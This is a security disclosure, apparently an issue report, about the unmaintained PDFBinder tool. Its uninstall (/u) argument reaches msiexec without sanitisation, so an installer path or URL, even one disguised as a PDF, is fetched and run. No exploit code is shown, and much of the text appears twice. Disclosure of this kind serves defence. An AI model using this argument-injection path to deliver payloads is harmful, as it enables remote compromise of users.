I have some security concerns and tried to reach the author of PDFBinder over a few channels without success so I am reaching out here. I understand that PDFBinder is not actively maintained anymore. However, it is still being used, including in sensitive fields, which is the reason of my report.
Looking at the code of Program.MainForm.Main(), PDFBinder can be launched in command line with a /u parameter to uninstall it by providing its product code. However, the second argument is used to start a msiexec subprocess without sanitization.
The lack of parameter sanitization allows to send a path or URL to an arbitrary MSI installer to the msiexec subprocess instead of the product code. The installer is then automatically retrieved and executed. In addition, since msiexec is used, the provided installer does not need to have an MSI or DLL extension. Any extension can be used (PDF for instance), which is illustrated below (victim command line on the left, remote access obtained on the right).
This raises two main concerns.
- Users may be tricked through social engineering into running a malicious installer masquerading as a PDF file.
- From a SOC / Incident Response perspective, detecting such attacks in logs is made harder because of the relatively legit command line style used.
I have some security concerns and tried to reach the author of PDFBinder over a few channels without success so I am reaching out here. I understand that PDFBinder is not actively maintained anymore. However, it is still being used, including in sensitive fields, which is the reason of my report.
Looking at the code of Program.MainForm.Main(), PDFBinder can be launched in command line with a
/uparameter to uninstall it by providing its product code. However, the second argument is used to start a msiexec subprocess without sanitization.The lack of parameter sanitization allows to send a path or URL to an arbitrary MSI installer to the msiexec subprocess instead of the product code. The installer is then automatically retrieved and executed. In addition, since msiexec is used, the provided installer does not need to have an MSI or DLL extension. Any extension can be used (PDF for instance), which is illustrated below (victim command line on the left, remote access obtained on the right).
This raises two main concerns.